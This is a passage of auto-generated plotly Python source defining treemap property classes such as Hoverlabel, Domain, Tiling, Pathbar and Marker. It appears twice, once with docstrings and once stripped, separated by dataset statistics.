to the Font constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.treemap.hoverlabel.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# namelength
# ----------
@property
def namelength(self):
"""
Sets the default length (in number of characters) of the trace
name in the hover labels for all traces. -1 shows the whole
name regardless of length. 0-3 shows the first 0-3 characters,
and an integer >3 will show the whole name if it is less than
that many characters, but if it is longer, will truncate to
`namelength - 3` characters and add an ellipsis.
The 'namelength' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|numpy.ndarray
"""
return self["namelength"]
@namelength.setter
def namelength(self, val):
self["namelength"] = val
# namelengthsrc
# -------------
@property
def namelengthsrc(self):
"""
Sets the source reference on plot.ly for namelength .
The 'namelengthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["namelengthsrc"]
@namelengthsrc.setter
def namelengthsrc(self, val):
self["namelengthsrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
"""
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
"""
Construct a new Hoverlabel object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Hoverlabel
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
Returns
-------
Hoverlabel
"""
super(Hoverlabel, self).__init__("hoverlabel")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Hoverlabel"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import hoverlabel as v_hoverlabel
# Initialize validators
# ---------------------
self._validators["align"] = v_hoverlabel.AlignValidator()
self._validators["alignsrc"] = v_hoverlabel.AlignsrcValidator()
self._validators["bgcolor"] = v_hoverlabel.BgcolorValidator()
self._validators["bgcolorsrc"] = v_hoverlabel.BgcolorsrcValidator()
self._validators["bordercolor"] = v_hoverlabel.BordercolorValidator()
self._validators["bordercolorsrc"] = v_hoverlabel.BordercolorsrcValidator()
self._validators["font"] = v_hoverlabel.FontValidator()
self._validators["namelength"] = v_hoverlabel.NamelengthValidator()
self._validators["namelengthsrc"] = v_hoverlabel.NamelengthsrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("align", None)
self["align"] = align if align is not None else _v
_v = arg.pop("alignsrc", None)
self["alignsrc"] = alignsrc if alignsrc is not None else _v
_v = arg.pop("bgcolor", None)
self["bgcolor"] = bgcolor if bgcolor is not None else _v
_v = arg.pop("bgcolorsrc", None)
self["bgcolorsrc"] = bgcolorsrc if bgcolorsrc is not None else _v
_v = arg.pop("bordercolor", None)
self["bordercolor"] = bordercolor if bordercolor is not None else _v
_v = arg.pop("bordercolorsrc", None)
self["bordercolorsrc"] = bordercolorsrc if bordercolorsrc is not None else _v
_v = arg.pop("font", None)
self["font"] = font if font is not None else _v
_v = arg.pop("namelength", None)
self["namelength"] = namelength if namelength is not None else _v
_v = arg.pop("namelengthsrc", None)
self["namelengthsrc"] = namelengthsrc if namelengthsrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Domain(_BaseTraceHierarchyType):
# column
# ------
@property
def column(self):
"""
If there is a layout grid, use the domain for this column in
the grid for this treemap trace .
The 'column' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["column"]
@column.setter
def column(self, val):
self["column"] = val
# row
# ---
@property
def row(self):
"""
If there is a layout grid, use the domain for this row in the
grid for this treemap trace .
The 'row' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["row"]
@row.setter
def row(self, val):
self["row"] = val
# x
# -
@property
def x(self):
"""
Sets the horizontal domain of this treemap trace (in plot
fraction).
The 'x' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'x[0]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
(1) The 'x[1]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
list
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# y
# -
@property
def y(self):
"""
Sets the vertical domain of this treemap trace (in plot
fraction).
The 'y' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'y[0]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
(1) The 'y[1]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
list
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
column
If there is a layout grid, use the domain for this
column in the grid for this treemap trace .
row
If there is a layout grid, use the domain for this row
in the grid for this treemap trace .
x
Sets the horizontal domain of this treemap trace (in
plot fraction).
y
Sets the vertical domain of this treemap trace (in plot
fraction).
"""
def __init__(self, arg=None, column=None, row=None, x=None, y=None, **kwargs):
"""
Construct a new Domain object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Domain
column
If there is a layout grid, use the domain for this
column in the grid for this treemap trace .
row
If there is a layout grid, use the domain for this row
in the grid for this treemap trace .
x
Sets the horizontal domain of this treemap trace (in
plot fraction).
y
Sets the vertical domain of this treemap trace (in plot
fraction).
Returns
-------
Domain
"""
super(Domain, self).__init__("domain")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Domain
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Domain"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import domain as v_domain
# Initialize validators
# ---------------------
self._validators["column"] = v_domain.ColumnValidator()
self._validators["row"] = v_domain.RowValidator()
self._validators["x"] = v_domain.XValidator()
self._validators["y"] = v_domain.YValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("column", None)
self["column"] = column if column is not None else _v
_v = arg.pop("row", None)
self["row"] = row if row is not None else _v
_v = arg.pop("x", None)
self["x"] = x if x is not None else _v
_v = arg.pop("y", None)
self["y"] = y if y is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
__all__ = [
"Domain",
"Hoverlabel",
"Insidetextfont",
"Marker",
"Outsidetextfont",
"Pathbar",
"Stream",
"Textfont",
"Tiling",
"hoverlabel",
"marker",
"pathbar",
]
from plotly.graph_objs.treemap import pathbar
from plotly.graph_objs.treemap import marker
from plotly.graph_objs.treemap import hoverlabel
| 35.408599
| 87
| 0.556737
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tiling(_BaseTraceHierarchyType):
@property
def flip(self):
return self["flip"]
@flip.setter
def flip(self, val):
self["flip"] = val
@property
def packing(self):
return self["packing"]
@packing.setter
def packing(self, val):
self["packing"] = val
@property
def pad(self):
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
@property
def squarifyratio(self):
return self["squarifyratio"]
@squarifyratio.setter
def squarifyratio(self, val):
self["squarifyratio"] = val
@property
def _parent_path_str(self):
return "treemap"
@property
def _prop_descriptions(self):
return """\
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
"""
def __init__(
self, arg=None, flip=None, packing=None, pad=None, squarifyratio=None, **kwargs
):
super(Tiling, self).__init__("tiling")
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Tiling
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Tiling"""
)
self._skip_invalid = kwargs.pop("skip_invalid", False)
from plotly.validators.treemap import tiling as v_tiling
self._validators["flip"] = v_tiling.FlipValidator()
self._validators["packing"] = v_tiling.PackingValidator()
self._validators["pad"] = v_tiling.PadValidator()
self._validators["squarifyratio"] = v_tiling.SquarifyratioValidator()
_v = arg.pop("flip", None)
self["flip"] = flip if flip is not None else _v
_v = arg.pop("packing", None)
self["packing"] = packing if packing is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("squarifyratio", None)
self["squarifyratio"] = squarifyratio if squarifyratio is not None else _v
self._process_kwargs(**dict(arg, **kwargs))
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
@property
def color(self):
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
@property
def colorsrc(self):
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
@property
def family(self):
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
@property
def familysrc(self):
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
@property
def size(self):
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
@property
def sizesrc(self):
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
@property
def _parent_path_str(self):
return "treemap"
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
super(Textfont, self).__init__("textfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Textfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Textfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import textfont as v_textfont
# Initialize validators
# ---------------------
self._validators["color"] = v_textfont.ColorValidator()
self._validators["colorsrc"] = v_textfont.ColorsrcValidator()
self._validators["family"] = v_textfont.FamilyValidator()
self._validators["familysrc"] = v_textfont.FamilysrcValidator()
self._validators["size"] = v_textfont.SizeValidator()
self._validators["sizesrc"] = v_textfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):
# maxpoints
# ---------
@property
def maxpoints(self):
return self["maxpoints"]
@maxpoints.setter
def maxpoints(self, val):
self["maxpoints"] = val
# token
# -----
@property
def token(self):
return self["token"]
@token.setter
def token(self, val):
self["token"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
"""
def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
super(Stream, self).__init__("stream")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Stream
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Stream"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import stream as v_stream
# Initialize validators
# ---------------------
self._validators["maxpoints"] = v_stream.MaxpointsValidator()
self._validators["token"] = v_stream.TokenValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("maxpoints", None)
self["maxpoints"] = maxpoints if maxpoints is not None else _v
_v = arg.pop("token", None)
self["token"] = token if token is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Pathbar(_BaseTraceHierarchyType):
# edgeshape
# ---------
@property
def edgeshape(self):
return self["edgeshape"]
@edgeshape.setter
def edgeshape(self, val):
self["edgeshape"] = val
# side
# ----
@property
def side(self):
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# textfont
# --------
@property
def textfont(self):
return self["textfont"]
@textfont.setter
def textfont(self, val):
self["textfont"] = val
# thickness
# ---------
@property
def thickness(self):
return self["thickness"]
@thickness.setter
def thickness(self, val):
self["thickness"] = val
# visible
# -------
@property
def visible(self):
return self["visible"]
@visible.setter
def visible(self, val):
self["visible"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
edgeshape
Determines which shape is used for edges between
`barpath` labels.
side
Determines on which side of the the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified the `pathbar.textfont.size` is used with 3
pixles extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
"""
def __init__(
self,
arg=None,
edgeshape=None,
side=None,
textfont=None,
thickness=None,
visible=None,
**kwargs
):
super(Pathbar, self).__init__("pathbar")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Pathbar
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Pathbar"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import pathbar as v_pathbar
# Initialize validators
# ---------------------
self._validators["edgeshape"] = v_pathbar.EdgeshapeValidator()
self._validators["side"] = v_pathbar.SideValidator()
self._validators["textfont"] = v_pathbar.TextfontValidator()
self._validators["thickness"] = v_pathbar.ThicknessValidator()
self._validators["visible"] = v_pathbar.VisibleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("edgeshape", None)
self["edgeshape"] = edgeshape if edgeshape is not None else _v
_v = arg.pop("side", None)
self["side"] = side if side is not None else _v
_v = arg.pop("textfont", None)
self["textfont"] = textfont if textfont is not None else _v
_v = arg.pop("thickness", None)
self["thickness"] = thickness if thickness is not None else _v
_v = arg.pop("visible", None)
self["visible"] = visible if visible is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Outsidetextfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
super(Outsidetextfont, self).__init__("outsidetextfont")
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Outsidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Outsidetextfont"""
)
self._skip_invalid = kwargs.pop("skip_invalid", False)
from plotly.validators.treemap import outsidetextfont as v_outsidetextfont
self._validators["color"] = v_outsidetextfont.ColorValidator()
self._validators["colorsrc"] = v_outsidetextfont.ColorsrcValidator()
self._validators["family"] = v_outsidetextfont.FamilyValidator()
self._validators["familysrc"] = v_outsidetextfont.FamilysrcValidator()
self._validators["size"] = v_outsidetextfont.SizeValidator()
self._validators["sizesrc"] = v_outsidetextfont.SizesrcValidator()
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
self._process_kwargs(**dict(arg, **kwargs))
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Marker(_BaseTraceHierarchyType):
@property
def autocolorscale(self):
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
@property
def cauto(self):
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
@property
def cmax(self):
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
@property
def cmid(self):
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
@property
def cmin(self):
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
@property
def coloraxis(self):
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
@property
def colorbar(self):
return self["colorbar"]
@colorbar.setter
def colorbar(self, val):
self["colorbar"] = val
@property
def colors(self):
return self["colors"]
@colors.setter
def colors(self, val):
self["colors"] = val
@property
def colorscale(self):
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
@property
def colorssrc(self):
return self["colorssrc"]
@colorssrc.setter
def colorssrc(self, val):
self["colorssrc"] = val
@property
def depthfade(self):
return self["depthfade"]
@depthfade.setter
def depthfade(self, val):
self["depthfade"] = val
@property
def line(self):
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
@property
def pad(self):
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
@property
def reversescale(self):
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
@property
def showscale(self):
return self["showscale"]
@showscale.setter
def showscale(self, val):
self["showscale"] = val
@property
def _parent_path_str(self):
return "treemap"
@property
def _prop_descriptions(self):
return """\
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax` Has an
effect only if colorsis set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colorsis set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colorsis set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colorsis set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colorsis set to a
numerical array.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
coloraxis=None,
colorbar=None,
colors=None,
colorscale=None,
colorssrc=None,
depthfade=None,
line=None,
pad=None,
reversescale=None,
showscale=None,
**kwargs
):
super(Marker, self).__init__("marker")
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Marker
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Marker"""
)
self._skip_invalid = kwargs.pop("skip_invalid", False)
from plotly.validators.treemap import marker as v_marker
self._validators["autocolorscale"] = v_marker.AutocolorscaleValidator()
self._validators["cauto"] = v_marker.CautoValidator()
self._validators["cmax"] = v_marker.CmaxValidator()
self._validators["cmid"] = v_marker.CmidValidator()
self._validators["cmin"] = v_marker.CminValidator()
self._validators["coloraxis"] = v_marker.ColoraxisValidator()
self._validators["colorbar"] = v_marker.ColorBarValidator()
self._validators["colors"] = v_marker.ColorsValidator()
self._validators["colorscale"] = v_marker.ColorscaleValidator()
self._validators["colorssrc"] = v_marker.ColorssrcValidator()
self._validators["depthfade"] = v_marker.DepthfadeValidator()
self._validators["line"] = v_marker.LineValidator()
self._validators["pad"] = v_marker.PadValidator()
self._validators["reversescale"] = v_marker.ReversescaleValidator()
self._validators["showscale"] = v_marker.ShowscaleValidator()
_v = arg.pop("autocolorscale", None)
self["autocolorscale"] = autocolorscale if autocolorscale is not None else _v
_v = arg.pop("cauto", None)
self["cauto"] = cauto if cauto is not None else _v
_v = arg.pop("cmax", None)
self["cmax"] = cmax if cmax is not None else _v
_v = arg.pop("cmid", None)
self["cmid"] = cmid if cmid is not None else _v
_v = arg.pop("cmin", None)
self["cmin"] = cmin if cmin is not None else _v
_v = arg.pop("coloraxis", None)
self["coloraxis"] = coloraxis if coloraxis is not None else _v
_v = arg.pop("colorbar", None)
self["colorbar"] = colorbar if colorbar is not None else _v
_v = arg.pop("colors", None)
self["colors"] = colors if colors is not None else _v
_v = arg.pop("colorscale", None)
self["colorscale"] = colorscale if colorscale is not None else _v
_v = arg.pop("colorssrc", None)
self["colorssrc"] = colorssrc if colorssrc is not None else _v
_v = arg.pop("depthfade", None)
self["depthfade"] = depthfade if depthfade is not None else _v
_v = arg.pop("line", None)
self["line"] = line if line is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("reversescale", None)
self["reversescale"] = reversescale if reversescale is not None else _v
_v = arg.pop("showscale", None)
self["showscale"] = showscale if showscale is not None else _v
self._process_kwargs(**dict(arg, **kwargs))
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Insidetextfont(_BaseTraceHierarchyType):
@property
def color(self):
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
@property
def colorsrc(self):
return self["colorsrc"]
@colorsrc.setter
